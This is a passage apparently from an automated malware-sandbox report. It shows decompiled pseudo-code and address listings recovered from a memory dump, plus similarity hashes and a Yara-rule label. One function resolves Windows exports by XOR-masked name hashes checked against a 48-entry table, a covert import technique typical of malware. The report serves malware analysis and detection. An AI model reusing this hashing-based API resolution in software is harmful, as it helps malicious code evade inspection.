																__eflags = ( <=  ? _t276 + 0x20 : _t276) - _t205;
																if(( <=  ? _t276 + 0x20 : _t276) == _t205) {
																	goto L163;
																}
																__eflags =  *_t314;
																if( *_t314 != 0) {
																	continue;
																}
																goto L52;
															}
															goto L163;
														}
														_t205 = _v36;
														while(1) {
															__eflags =  *((char*)(_t309 + _t205));
															if( *((char*)(_t309 + _t205)) == 0) {
																break;
															}
															_t309 = _t309 + 1;
															__eflags = _t309 - 0x7fffffff;
															if(_t309 < 0x7fffffff) {
																continue;
															}
															_v36 = _t205;
															goto L77;
														}
														L158:
														_v36 = _t205;
														L159:
														__eflags = _t309;
														if(__eflags == 0) {
															goto L77;
														}
														if(__eflags > 0) {
															goto L78;
														}
														goto L83;
													}
													asm("bsf edx, eax");
													_v36 = _t378;
													_t309 = _t309 + _t356;
													_t379 = _v32;
													goto L159;
												}
												_t205 = _v36;
												_t356 = _t377;
												_t309 = 0;
												__eflags = 0;
												while(1) {
													__eflags =  *((char*)(_t309 + _t205));
													if( *((char*)(_t309 + _t205)) == 0) {
														goto L158;
													}
													_t309 = _t309 + 1;
													__eflags = _t309 - _t377;
													if(_t309 < _t377) {
														continue;
													}
													_v36 = _t205;
													goto L69;
												}
												goto L158;
												L163:
												_t270 = _v68;
												_t377 = _v32;
												__eflags = _t244;
											} while (_t244 != 0);
											goto L52;
										}
										goto L39;
									}
									_t236 =  *_t292;
									 *_t261 = _t236;
									__eflags = _t236;
									if(_t236 == 0) {
										goto L33;
									}
									_v60 = _t370;
									_t237 = 0;
									__eflags = 0;
									_v64 = _t240;
									_v68 = _t353;
									while(1) {
										_t237 = _t237 + 1;
										_t251 =  *((char*)(_t292 + _t237 * 2 - 1));
										 *(_t261 + _t237 * 2 - 1) = _t251;
										__eflags = _t251;
										if(_t251 == 0) {
											break;
										}
										_t252 =  *((char*)(_t292 + _t237 * 2));
										 *(_t261 + _t237 * 2) = _t252;
										__eflags = _t252;
										if(_t252 != 0) {
											continue;
										}
										break;
									}
									_t370 = _v60;
									_t240 = _v64;
									_t353 = _v68;
									goto L33;
								}
							}
							_t261 = _v56;
							goto L36;
						}
						_t347 = _t363 & 0x0000000f;
						__eflags = _t347;
						if(_t347 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t258 =  ~( ~_t347 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t258;
							while(1) {
								asm("movdqu xmm1, [esi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t182;
								if(_t182 != 0) {
									break;
								}
								_t347 = _t347 + 0x10;
								__eflags = _t347 - _t258;
								if(_t347 < _t258) {
									continue;
								}
								__eflags = _t258 - 0x7fffffff;
								if(_t258 >= 0x7fffffff) {
									L21:
									_t260 = 0x40;
									_t240 = 0x7fffffff;
									goto L22;
								} else {
									goto L19;
								}
								while(1) {
									L19:
									__eflags =  *((char*)(_t258 + _t363));
									if( *((char*)(_t258 + _t363)) == 0) {
										break;
									}
									_t258 = _t258 + 1;
									__eflags = _t258 - 0x7fffffff;
									if(_t258 < 0x7fffffff) {
										continue;
									}
									goto L21;
								}
								L165:
								__eflags = _t240 - 0xfffffffe;
								if(_t240 != 0xfffffffe) {
									_t260 = 0x40;
								} else {
									 *_t363 = 0;
									_t260 = _v52;
								}
								goto L22;
							}
							asm("bsf ebx, eax");
							_t240 = _t258 + _t347;
							goto L165;
						}
						_t240 = 0;
						_t347 =  ~_t347 + 0x10;
						__eflags = _t347;
						while(1) {
							__eflags =  *((char*)(_t240 + _t363));
							if( *((char*)(_t240 + _t363)) == 0) {
								goto L165;
							}
							_t240 = _t240 + 1;
							__eflags = _t240 - _t347;
							if(_t240 < _t347) {
								continue;
							}
							goto L15;
						}
						goto L165;
					}
					_t188 =  &_v56;
					goto L37;
				}
				if(_t363 == 0) {
					L6:
					_push(1);
					_push(_t181);
					E008A10B0();
					_t391 = _t391 + 8;
					goto L8;
				}
				_t349 =  *_t181;
				 *_t363 = _t349;
				if(_t349 == 0) {
					goto L6;
				}
				_t288 = 0;
				while(1) {
					_t288 = _t288 + 1;
					_t350 =  *((char*)(_t181 + _t288 * 2 - 1));
					 *((char*)(_t363 + _t288 * 2 - 1)) = _t350;
					if(_t350 == 0) {
						goto L6;
					}
					_t351 =  *((char*)(_t181 + _t288 * 2));
					 *((char*)(_t363 + _t288 * 2)) = _t351;
					if(_t351 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x008b173e
0x008b1742
0x008b1744
0x008b1748
0x008b174f
0x008b1751
0x008b1754
0x008b175a
0x008b1791
0x008b1794
0x008b1794
0x008b1798
0x008b17a0
0x008b17a6
0x008b17b1
0x008b17b3
0x008b1e9e
0x008b1ea3
0x008b182d
0x008b1832
0x008b1832
0x008b1835
0x008b1838
0x008b183b
0x008b183d
0x008b1852
0x008b1855
0x008b1855
0x008b185b
0x008b1863
0x008b1863
0x008b1863
0x008b1866
0x008b186d
0x008b1870
0x008b1876
0x008b1878
0x008b187b
0x008b187f
0x008b1881
0x008b18d6
0x00000000
0x008b1883
0x008b1883
0x008b1885
0x008b18c1
0x008b18c1
0x008b18c3
0x008b18c4
0x008b18c8
0x008b18cd
0x008b18d1
0x008b18d9
0x008b18d9
0x008b18dd
0x008b18e1
0x008b18e5
0x008b18e8
0x008b18ee
0x008b18f3
0x008b18f3
0x008b18f7
0x008b1900
0x008b1900
0x008b1905
0x008b1907
0x008b1909
0x008b1911
0x008b1913
0x008b1919
0x008b191d
0x008b1957
0x008b1a03
0x008b1a03
0x008b1a06
0x008b1a08
0x008b1a0f
0x008b1a0f
0x008b1a11
0x008b1a15
0x008b1a1f
0x008b1a23
0x008b1a33
0x008b1a33
0x008b1921
0x008b1947
0x008b1947
0x008b1949
0x008b194a
0x008b194f
0x00000000
0x008b194f
0x008b1923
0x008b1926
0x008b192a
0x00000000
0x00000000
0x008b192c
0x008b192e
0x008b192e
0x008b192f
0x008b1934
0x008b193a
0x00000000
0x00000000
0x008b193c
0x008b1940
0x008b1945
0x00000000
0x00000000
0x00000000
0x008b1945
0x00000000
0x008b192e
0x008b18f9
0x008b18fe
0x008b195f
0x008b1961
0x008b1963
0x008b19ac
0x008b19ac
0x008b19b1
0x008b19b3
0x008b19b5
0x008b19bd
0x008b19bf
0x008b19c5
0x008b19c7
0x008b19c9
0x008b1a00
0x00000000
0x008b1a00
0x008b19cb
0x008b19cd
0x008b19f3
0x008b19f3
0x008b19f5
0x008b19f6
0x008b19fb
0x00000000
0x008b19fb
0x008b19cf
0x008b19d2
0x008b19d4
0x008b19d6
0x00000000
0x00000000
0x008b19d8
0x008b19d8
0x008b19da
0x008b19da
0x008b19db
0x008b19e0
0x008b19e4
0x008b19e6
0x00000000
0x00000000
0x008b19e8
0x008b19ec
0x008b19ef
0x008b19f1
0x00000000
0x00000000
0x00000000
0x008b19f1
0x00000000
0x008b19da
0x008b1965
0x008b1968
0x00000000
0x00000000
0x008b196a
0x008b196e
0x008b1971
0x008b1977
0x008b197b
0x008b197e
0x008b1981
0x008b1981
0x008b1983
0x008b1986
0x008b198a
0x008b198c
0x008b198c
0x008b1992
0x008b1998
0x008b199b
0x008b199e
0x00000000
0x00000000
0x008b19a4
0x008b19a5
0x008b19a6
0x008b19aa
0x00000000
0x00000000
0x00000000
0x008b19aa
0x008b1a36
0x008b1a3a
0x008b1a3e
0x008b1a40
0x00000000
0x00000000
0x008b1a4b
0x008b1a4e
0x008b1a56
0x008b1a5a
0x008b1a5e
0x008b1a5e
0x008b1a61
0x008b1a65
0x008b1a69
0x008b1a69
0x008b1a6b
0x008b1a6d
0x008b1a8a
0x008b1a96
0x008b1a9a
0x008b1a9a
0x008b1aa0
0x008b1aa4
0x008b1aa4
0x008b1aa9
0x008b1aad
0x008b1ab1
0x008b1ab3
0x00000000
0x00000000
0x008b1ab9
0x008b1abc
0x008b1abe
0x00000000
0x00000000
0x008b1ac0
0x008b1ac4
0x008b1ac8
0x008b1ace
0x008b1aeb
0x008b1aeb
0x008b1af0
0x008b1af0
0x008b1af4
0x008b1af4
0x008b1af6
0x008b1af9
0x008b1afd
0x008b1b01
0x008b1b05
0x008b1b09
0x008b1b0c
0x008b1b0f
0x008b1b15
0x008b1b18
0x008b1b1b
0x008b1b21
0x008b1b24
0x008b1b27
0x008b1b29
0x00000000
0x00000000
0x008b1b35
0x008b1b37
0x008b1b40
0x008b1b40
0x008b1b44
0x008b1b46
0x00000000
0x00000000
0x008b1b4c
0x008b1b4c
0x008b1b4e
0x008b1bb1
0x008b1bb1
0x008b1bb4
0x008b1bc8
0x008b1bd4
0x008b1bd4
0x008b1bda
0x008b1bda
0x008b1bdf
0x008b1be3
0x008b1be7
0x008b1be9
0x00000000
0x00000000
0x008b1bef
0x008b1bf2
0x008b1bf4
0x00000000
0x00000000
0x008b1bf6
0x008b1bfc
0x008b1c0d
0x008b1c0d
0x008b1c12
0x008b1c17
0x008b1c19
0x008b1c1b
0x008b1c1d
0x008b1c23
0x008b1c23
0x008b1c25
0x008b1c25
0x008b1c2c
0x008b1c2e
0x008b1c31
0x008b1c31
0x008b1c33
0x008b1c37
0x008b1d7b
0x008b1d7b
0x008b1d82
0x008b1d84
0x008b1d8a
0x008b1d8c
0x008b1d8e
0x008b1dc8
0x00000000
0x008b1dc8
0x008b1d90
0x008b1d92
0x008b1db8
0x008b1db8
0x008b1dba
0x008b1dbb
0x008b1dc0
0x00000000
0x008b1dc0
0x008b1d94
0x008b1d97
0x008b1d99
0x008b1d9b
0x00000000
0x00000000
0x008b1d9d
0x008b1d9d
0x008b1d9f
0x008b1d9f
0x008b1da0
0x008b1da5
0x008b1da9
0x008b1dab
0x00000000
0x00000000
0x008b1dad
0x008b1db1
0x008b1db4
0x008b1db6
0x00000000
0x00000000
0x00000000
0x008b1db6
0x00000000
0x008b1d9f
0x008b1c3d
0x008b1c41
0x00000000
0x00000000
0x008b1c47
0x008b1c49
0x008b1cb0
0x008b1cb5
0x008b1cb5
0x008b1cb8
0x008b1cbb
0x008b1cbe
0x008b1cc0
0x008b1cd6
0x008b1cd9
0x008b1cd9
0x008b1cdf
0x008b1ce7
0x008b1ce7
0x008b1ce7
0x008b1cea
0x008b1cf4
0x008b1cf7
0x008b1cfa
0x008b1d00
0x008b1d02
0x008b1d08
0x008b1d0a
0x008b1d0c
0x008b1d43
0x00000000
0x008b1d0e
0x008b1d0e
0x008b1d10
0x008b1d36
0x008b1d36
0x008b1d38
0x008b1d39
0x008b1d3e
0x008b1d46
0x008b1d46
0x008b1d4c
0x008b1d4f
0x008b1d51
0x008b1d51
0x008b1d53
0x00000000
0x00000000
0x008b1d59
0x008b1d5d
0x008b1d63
0x008b1d63
0x008b1d66
0x008b1d67
0x008b1d69
0x008b1d6b
0x00000000
0x00000000
0x008b1d6d
0x008b1d6f
0x008b1dd0
0x00000000
0x008b1dd0
0x008b1d71
0x008b1d71
0x008b1d73
0x00000000
0x00000000
0x008b1d61
0x008b1d62
0x008b1d62
0x008b1d62
0x008b1d63
0x008b1d12
0x008b1d15
0x008b1d17
0x008b1d19
0x00000000
0x00000000
0x008b1d1b
0x008b1d1b
0x008b1d1d
0x008b1d1d
0x008b1d1e
0x008b1d23
0x008b1d27
0x008b1d29
0x00000000
0x00000000
0x008b1d2b
0x008b1d2f
0x008b1d32
0x008b1d34
0x00000000
0x00000000
0x00000000
0x008b1d34
0x00000000
0x008b1d1d
0x008b1d0c
0x008b1cc2
0x00000000
0x008b1cc2
0x008b1c4b
0x008b1c4f
0x008b1c4f
0x008b1c52
0x008b1c66
0x008b1c72
0x008b1c72
0x008b1c78
0x008b1c78
0x008b1c7d
0x008b1c81
0x008b1c85
0x008b1c87
0x00000000
0x00000000
0x008b1c8d
0x008b1c90
0x008b1c92
0x00000000
0x00000000
0x008b1c94
0x008b1c9a
0x008b1cab
0x008b1cab
0x00000000
0x00000000
0x00000000
0x00000000
0x008b1c9c
0x008b1c9c
0x008b1c9c
0x008b1ca0
0x00000000
0x00000000
0x008b1ca2
0x008b1ca3
0x008b1ca9
0x00000000
0x00000000
0x00000000
0x008b1ca9
0x00000000
0x008b1c9c
0x008b1dd9
0x008b1ddc
0x00000000
0x008b1ddc
0x008b1c56
0x008b1c58
0x008b1c58
0x008b1c5b
0x008b1c5b
0x008b1c5f
0x00000000
0x00000000
0x008b1c61
0x008b1c62
0x008b1c64
0x00000000
0x00000000
0x00000000
0x008b1c64
0x00000000
0x008b1c5b
0x008b1c1f
0x008b1c21
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b1bfe
0x008b1bfe
0x008b1bfe
0x008b1c02
0x00000000
0x00000000
0x008b1c04
0x008b1c05
0x008b1c0b
0x00000000
0x00000000
0x00000000
0x008b1c0b
0x00000000
0x008b1bfe
0x008b1de3
0x008b1de6
0x00000000
0x008b1de6
0x008b1bb8
0x008b1bba
0x008b1bba
0x008b1bbd
0x008b1bbd
0x008b1bc1
0x00000000
0x00000000
0x008b1bc3
0x008b1bc4
0x008b1bc6
0x00000000
0x00000000
0x00000000
0x008b1bc6
0x00000000
0x008b1bbd
0x008b1b50
0x008b1b55
0x008b1b57
0x008b1b59
0x008b1b61
0x008b1b63
0x008b1b69
0x008b1b6b
0x008b1b6d
0x008b1ba7
0x00000000
0x008b1ba7
0x008b1b6f
0x008b1b71
0x008b1b97
0x008b1b97
0x008b1b99
0x008b1b9a
0x008b1b9f
0x00000000
0x008b1b9f
0x008b1b73
0x008b1b76
0x008b1b78
0x008b1b7a
0x00000000
0x00000000
0x008b1b7c
0x008b1b7c
0x008b1b7e
0x008b1b7e
0x008b1b7f
0x008b1b84
0x008b1b88
0x008b1b8a
0x00000000
0x00000000
0x008b1b8c
0x008b1b90
0x008b1b93
0x008b1b95
0x00000000
0x00000000
0x00000000
0x008b1b95
0x00000000
0x008b1b7e
0x008b1b39
0x008b1b3a
0x008b1b3e
0x00000000
0x00000000
0x00000000
0x008b1b3e
0x008b1ded
0x008b1df0
0x008b1df6
0x008b1df6
0x008b1df7
0x00000000
0x00000000
0x008b1dfd
0x008b1e06
0x008b1e0b
0x008b1e0e
0x008b1e12
0x00000000
0x00000000
0x008b1e18
0x008b1e1b
0x008b1e1f
0x008b1e1f
0x008b1e20
0x008b1e21
0x008b1e2b
0x008b1e31
0x008b1e34
0x008b1e36
0x00000000
0x00000000
0x008b1e38
0x008b1e3b
0x00000000
0x00000000
0x00000000
0x008b1e3d
0x00000000
0x008b1e1f
0x008b1ad0
0x008b1ad4
0x008b1ad4
0x008b1ad8
0x00000000
0x00000000
0x008b1ade
0x008b1adf
0x008b1ae5
0x00000000
0x00000000
0x008b1ae7
0x00000000
0x008b1ae7
0x008b1e42
0x008b1e42
0x008b1e46
0x008b1e46
0x008b1e48
0x00000000
0x00000000
0x008b1e4e
0x00000000
0x00000000
0x00000000
0x008b1e54
0x008b1e59
0x008b1e5c
0x008b1e60
0x008b1e62
0x00000000
0x008b1e62
0x008b1a6f
0x008b1a73
0x008b1a75
0x008b1a75
0x008b1a77
0x008b1a77
0x008b1a7b
0x00000000
0x00000000
0x008b1a81
0x008b1a82
0x008b1a84
0x00000000
0x00000000
0x008b1a86
0x00000000
0x008b1a86
0x00000000
0x008b1e68
0x008b1e68
0x008b1e6b
0x008b1e6f
0x008b1e6f
0x00000000
0x008b1e77
0x00000000
0x008b18fe
0x008b1887
0x008b188a
0x008b188c
0x008b188e
0x00000000
0x00000000
0x008b1890
0x008b1894
0x008b1894
0x008b1896
0x008b189a
0x008b189d
0x008b189d
0x008b189e
0x008b18a3
0x008b18a7
0x008b18a9
0x00000000
0x00000000
0x008b18ab
0x008b18af
0x008b18b2
0x008b18b4
0x00000000
0x00000000
0x00000000
0x008b18b4
0x008b18b6
0x008b18ba
0x008b18be
0x00000000
0x008b18be
0x008b1881
0x008b183f
0x00000000
0x008b183f
0x008b17bb
0x008b17bb
0x008b17be
0x008b17d6
0x008b17da
0x008b17e6
0x008b17e6
0x008b17ec
0x008b17ec
0x008b17f1
0x008b17f5
0x008b17f9
0x008b17fb
0x00000000
0x00000000
0x008b1801
0x008b1804
0x008b1806
0x00000000
0x00000000
0x008b1808
0x008b180e
0x008b1823
0x008b1823
0x008b1828
0x00000000
0x00000000
0x00000000
0x00000000
0x008b1810
0x008b1810
0x008b1810
0x008b1814
0x00000000
0x00000000
0x008b181a
0x008b181b
0x008b1821
0x00000000
0x00000000
0x00000000
0x008b1821
0x008b1e7c
0x008b1e7c
0x008b1e7f
0x008b1e8d
0x008b1e81
0x008b1e81
0x008b1e84
0x008b1e84
0x00000000
0x008b1e7f
0x008b1e97
0x008b1e9a
0x00000000
0x008b1e9a
0x008b17c2
0x008b17c4
0x008b17c4
0x008b17c7
0x008b17c7
0x008b17cb
0x00000000
0x00000000
0x008b17d1
0x008b17d2
0x008b17d4
0x00000000
0x00000000
0x00000000
0x008b17d4
0x00000000
0x008b17c7
0x008b17a8
0x00000000
0x008b17a8
0x008b175e
0x008b1784
0x008b1784
0x008b1786
0x008b1787
0x008b178c
0x00000000
0x008b178c
0x008b1760
0x008b1763
0x008b1767
0x00000000
0x00000000
0x008b1769
0x008b176b
0x008b176b
0x008b176c
0x008b1771
0x008b1777
0x00000000
0x00000000
0x008b1779
0x008b177d
0x008b1782
0x00000000
0x00000000
0x00000000
0x008b1782
0x00000000

Strings

@, xrefs: 008B1798

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: a8b937767d9d941c8a342fb20a13b9f32eeb100c99e286f27a39f05552e35147
Instruction ID: d933c75656198eae30e50d91ebb7ebaa83225bcfc76e4999754a93b987da9dc6
Opcode Fuzzy Hash: a8b937767d9d941c8a342fb20a13b9f32eeb100c99e286f27a39f05552e35147
Instruction Fuzzy Hash: 1B324B74A087924BDF158E2884A43AA7FD2FFC6310F9C866DE895CF356DA74C941C782

Uniqueness

Uniqueness Score: -1.00%

Function 00899E70, Relevance: 1.8, Strings: 1, Instructions: 591
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00899E70(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t212;
				void* _t214;
				void* _t218;
				void* _t287;
				void* _t289;
				void* _t290;
				void* _t291;
				char* _t324;
				void* _t337;
				void* _t340;
				signed int _t358;
				char _t360;
				intOrPtr _t369;
				intOrPtr _t370;
				void* _t371;
				void* _t372;
				void* _t374;
				void* _t376;
				void* _t391;
				void* _t410;
				intOrPtr* _t438;
				signed int _t528;
				char* _t529;
				void* _t530;
				intOrPtr* _t533;
				void* _t534;
				signed int _t537;
				void* _t538;
				void* _t539;
				void* _t541;
				intOrPtr _t542;
				void* _t550;
				signed int _t551;
				signed int _t552;
				signed int _t553;
				intOrPtr* _t554;
				intOrPtr _t555;
				void* _t556;
				intOrPtr _t557;
				intOrPtr _t558;
				intOrPtr _t559;
				void* _t561;
				intOrPtr* _t563;
				void* _t564;

				_t512 = __edx;
				_t557 = __edx;
				_t369 = __ecx;
				if(E008C4850(E008B9640(__ecx, 0), __edx) == 0 ||  *((char*)(E008A3930(__ecx, 0, _t530, _t539) + 0xb)) != 0x20) {
					_t212 = E008C48C0(E008B9640(_t369, 0), _t512);
					__eflags = _t212;
					if(_t212 == 0) {
						L36:
						__eflags = 0;
						return 0;
					} else {
						_t214 = E008A3930(_t369, 0, _t530, _t539);
						__eflags =  *((char*)(_t214 + 0xb)) - 0x40;
						if( *((char*)(_t214 + 0xb)) != 0x40) {
							goto L36;
						} else {
							 *((intOrPtr*)(_t563 + 0x10)) = 0x40;
							goto L6;
						}
					}
				} else {
					 *((intOrPtr*)(_t563 + 0x10)) = 0x20;
					L6:
					 *((intOrPtr*)(_t563 + 0x4e8)) = 0;
					 *((intOrPtr*)(_t563 + 0x4ec)) = 0;
					 *((intOrPtr*)(_t563 + 0x4f0)) = 0;
					E008B06A0(_t563 + 0x470, _t557, 0);
					E008A2370(_t563 + 0x474, _t530, _t539);
					_t218 = E008B6EC0(_t563 + 0x474,  *((intOrPtr*)(_t563 + 0x478)), 0);
					E0089AC00(_t563 + 0x47c, 9);
					E008AFDB0(_t563 + 0x480, _t563 + 0x484);
					E008B6EC0(_t218,  *((intOrPtr*)(_t563 + 0x488)), 0);
					E008B0B10(_t563 + 0x484);
					E008A8CA0(_t563 + 0x47c);
					E008B0B10(_t563 + 0x474);
					_t391 = _t563 + 0x18c;
					 *((intOrPtr*)(_t391 - 0x10)) = 0;
					 *((char*)(_t391 - 0xc)) = 1;
					 *((intOrPtr*)(_t391 - 8)) = 0;
					 *((intOrPtr*)(_t391 - 4)) = 3;
					E008A87A0(_t391);
					_push(1);
					if(E008BCEA0(_t369, _t563 + 0x180,  *((intOrPtr*)(_t563 + 0x46c)), _t563 + 0x484, _t218) != 0) {
						 *((intOrPtr*)(_t563 + 4)) = _t557;
						_t538 = _t563 + 0x1c0;
						_t556 = _t563 + 0x4c4;
						goto L8;
						L8:
						E008A8AB0(_t563 + 0x4c4, _t538, 0);
						E008AFDB0(_t563 + 0x4c0, _t556);
						E008B37E0(_t563 + 0x4f0,  *((intOrPtr*)(_t563 + 0x4c8)),  *((intOrPtr*)(_t563 + 0x4e8)));
						E008B0B10(_t556);
						E008A8CA0(_t563 + 0x4bc);
						if(E008BD0E0(_t563 + 0x17c) != 0) {
							goto L8;
						} else {
							_t557 =  *((intOrPtr*)(_t563 + 4));
						}
					}
					E008A8CA0(_t563 + 0x18c);
					if( *((char*)(_t563 + 0x180)) != 0) {
						_t555 =  *((intOrPtr*)(_t563 + 0x17c));
						if(_t555 == 0 || _t555 == 0xffffffff) {
							_t360 = 1;
						} else {
							_t360 = 0;
						}
						if(_t360 == 0) {
							E008BCE70(_t555);
						}
					}
					 *((intOrPtr*)(_t563 + 0x17c)) = 0;
					E008B0B10(_t563 + 0x46c);
					 *((intOrPtr*)(_t563 + 0x440)) = 0;
					 *((intOrPtr*)(_t563 + 0x444)) = 0;
					 *((intOrPtr*)(_t563 + 0x448)) = 0;
					_t541 = E008BE170(0,  *((intOrPtr*)(_t563 + 0x4e8)));
					 *((intOrPtr*)(_t563 + 0x14)) =  *((intOrPtr*)(_t563 + 0x4e8));
					 *_t563 = _t369;
					 *((intOrPtr*)(_t563 + 4)) = _t557;
					_t558 = 0;
					while(1) {
						_t542 =  ==  ? _t558 : _t541;
						_t533 = E008B7600(_t563 + 0x4ec, _t542);
						_t516 = _t533;
						if(E0089A830( *((intOrPtr*)(_t563 + 0x10)), _t533, _t542) == 0) {
							goto L35;
						}
						E008B06A0(_t563 + 0x4d0, _t558, 0);
						E008A2370(_t563 + 0x4d4, _t533, _t542);
						E008B6EC0(E008B6EC0(_t563 + 0x4d4,  *((intOrPtr*)(_t563 + 0x4d8)), 0),  *_t533, 0);
						E008B0B10(_t563 + 0x4d4);
						E008BA280(_t563 + 0x49c,  *((intOrPtr*)(_t563 + 0x4d8)), 1, 0, 0x80);
						E008BA520(_t563 + 0x494, _t516, _t563 + 0x4a4, 0);
						E008C4A20(_t563 + 0x4dc, E008B9640(_t563 + 0x4a4, 0));
						E008B9510(_t563 + 0x4a0);
						E008BBDC0(_t563 + 0x49c, 0);
						if(E008B7620(_t563 + 0x4dc, _t542) != 0) {
							 *((intOrPtr*)(_t563 + 0x4b0)) = _t558;
							_t410 = _t563 + 0x4dc;
							 *((intOrPtr*)(_t410 - 0x28)) = _t558;
							 *((intOrPtr*)(_t410 - 0x24)) = _t558;
							E008B7560(_t410, _t533, _t542);
							__eflags =  *((char*)(_t563 + 0x49c));
							if( *((char*)(_t563 + 0x49c)) != 0) {
								E008BBE30(_t563 + 0x498, _t542);
							}
						} else {
							if( *((intOrPtr*)(_t563 + 0x4dc)) > 0) {
								 *((intOrPtr*)(_t563 + 0xc)) = _t533;
								 *((intOrPtr*)(_t563 + 8)) = _t542;
								_t376 = _t563 + 0x4f4;
								do {
									_t554 = E008B7600(_t563 + 0x4e0, _t558);
									E008B1020(_t554, _t376);
									_t358 = E008BD620( *((intOrPtr*)(_t563 + 0x4f4)), E008B6040( *((intOrPtr*)(_t563 + 0x4f4)), 0x7fffffff));
									E008B0B10(_t376);
									_t537 = _t358 ^ 0x38ba5c7b;
									_t528 = 0;
									while(_t537 !=  *((intOrPtr*)(0x8c9440 + _t528 * 4))) {
										_t528 = _t528 + 1;
										if(_t528 < 0x30) {
											continue;
										} else {
											_t529 =  *_t554;
											if(_t529 != 0) {
												 *_t529 = 0;
											}
										}
										goto L27;
									}
									L27:
									_t558 = _t558 + 1;
								} while (_t558 <  *((intOrPtr*)(_t563 + 0x4dc)));
								_t533 =  *((intOrPtr*)(_t563 + 0xc));
								_t558 = 0;
								_t542 =  *((intOrPtr*)(_t563 + 8));
							}
							E008B71F0(_t563 + 0x4b4, _t542, E008B3EC0(_t563 + 0x4dc));
							E008B7560(_t563 + 0x4dc, _t533, _t542);
							if( *((char*)(_t563 + 0x49c)) != 0) {
								E008BBE30(_t563 + 0x498, _t542);
							}
						}
						E008A8CA0(_t563 + 0x48c);
						E008B0B10(_t563 + 0x4cc);
						if(E008B7620(_t563 + 0x4b0, _t542) != 0) {
							E008B7560(_t563 + 0x4b0, _t533, _t542);
							goto L35;
						}
						_t370 =  *_t563;
						_t559 =  *((intOrPtr*)(_t563 + 4));
						_t543 = E008BE170(0,  *((intOrPtr*)(_t563 + 0x4b0)));
						E008B37E0(_t563 + 0x448,  *_t533,  *((intOrPtr*)(_t563 + 0x440)));
						E008B37E0(_t563 + 0x448,  *((intOrPtr*)(E008B7600(_t563 + 0x4b4, _t252))),  *((intOrPtr*)(_t563 + 0x440)));
						E008B7560(_t563 + 0x4b0, _t533, _t252);
						E008B7560(_t563 + 0x4e8, _t533, _t252);
						E008B06A0(_t563 + 0x450, _t559, 0);
						E008B06A0(_t563 + 0x458, _t559, 0);
						E008B6EC0(_t563 + 0x454,  *((intOrPtr*)(E008B7600(_t563 + 0x444, 0))), 0);
						E008B6EC0(_t563 + 0x45c,  *((intOrPtr*)(E008B7600(_t563 + 0x444, 1))), 0);
						E008B06A0(_t563 + 0x460, _t559, 0);
						E008A2370(_t563 + 0x464, _t533, _t252);
						E008B6EC0(E008B6EC0(_t563 + 0x464,  *((intOrPtr*)(_t563 + 0x468)), 0),  *((intOrPtr*)(_t563 + 0x458)), 0);
						E008B0B10(_t563 + 0x464);
						E008BA280(_t563 + 0x42c,  *((intOrPtr*)(_t563 + 0x468)), 1, 0, 0x80);
						E008BA520(_t563 + 0x424,  *((intOrPtr*)(_t563 + 0x4b0)), _t563 + 0x430, 0);
						__eflags =  *((char*)(_t563 + 0x42c));
						if( *((char*)(_t563 + 0x42c)) != 0) {
							E008BBE30(_t563 + 0x428, _t543);
						}
						E008A8CA0(_t563 + 0x41c);
						__eflags = E008B9660(_t563 + 0x430);
						if(__eflags == 0) {
							E008B06A0(_t563 + 0x3e4, _t559, 0);
							_push(0);
							E008B9350(_t563 + 0x3f4);
							_push(0);
							E008B9350(_t563 + 0x404);
							_t438 = _t563 + 0x410;
							 *_t438 = 0;
							 *((intOrPtr*)(_t438 + 4)) = 0;
							 *((intOrPtr*)(_t438 + 8)) = 0;
							E008B7560(_t438, _t533, _t543);
							E008BA110(_t563 + 0x400);
							_t280 = E008BA110(_t563 + 0x3f0);
							__eflags =  *((intOrPtr*)(_t563 + 0x10)) - 0x20;
							if( *((intOrPtr*)(_t563 + 0x10)) != 0x20) {
								__eflags =  *((intOrPtr*)(_t563 + 0x10)) - 0x40;
								if( *((intOrPtr*)(_t563 + 0x10)) == 0x40) {
									_t337 = E008C47D0(E008B9640(_t563 + 0x434, 0));
									_t280 = _t337 + 0x88;
									__eflags = _t337 + 0x88;
								}
							} else {
								_t280 = E008C47D0(E008B9640(_t563 + 0x434, 0)) + 0x78;
							}
							_t534 = E008C4830(E008B9640(_t563 + 0x434, 0),  *_t280);
							 *((intOrPtr*)(_t563 + 0x3ec)) =  *((intOrPtr*)(_t534 + 0x10));
							E008B0B30(_t563 + 0x3e8,  *((intOrPtr*)(_t534 + 0xc)), E008C4830(E008B9640(_t563 + 0x434, 0),  *((intOrPtr*)(_t534 + 0xc))));
							_t287 = E008C4830(E008B9640(_t563 + 0x434, 0),  *((intOrPtr*)(_t534 + 0x20)));
							__eflags =  *((intOrPtr*)(_t534 + 0x18));
							if( *((intOrPtr*)(_t534 + 0x18)) > 0) {
								 *_t563 = _t370;
								_t553 = 0;
								__eflags = 0;
								 *((intOrPtr*)(_t563 + 4)) = _t559;
								_t374 = _t287;
								do {
									E008B37E0(_t563 + 0x418, E008C4830(E008B9640(_t563 + 0x434, 0),  *((intOrPtr*)(_t374 + _t553 * 4))),  *((intOrPtr*)(_t563 + 0x410)));
									_t553 = _t553 + 1;
									__eflags = _t553 -  *((intOrPtr*)(_t534 + 0x18));
								} while (_t553 <  *((intOrPtr*)(_t534 + 0x18)));
								_t370 =  *_t563;
								_t559 =  *((intOrPtr*)(_t563 + 4));
							}
							_t289 = E008C4830(E008B9640(_t563 + 0x434, 0),  *((intOrPtr*)(_t534 + 0x24)));
							__eflags =  *((intOrPtr*)(_t534 + 0x18));
							if( *((intOrPtr*)(_t534 + 0x18)) > 0) {
								 *_t563 = _t370;
								_t552 = 0;
								__eflags = 0;
								 *((intOrPtr*)(_t563 + 4)) = _t559;
								_t561 = _t289;
								do {
									E008B9670(_t563 + 0x404, E008B9650(_t563 + 0x400) + 2);
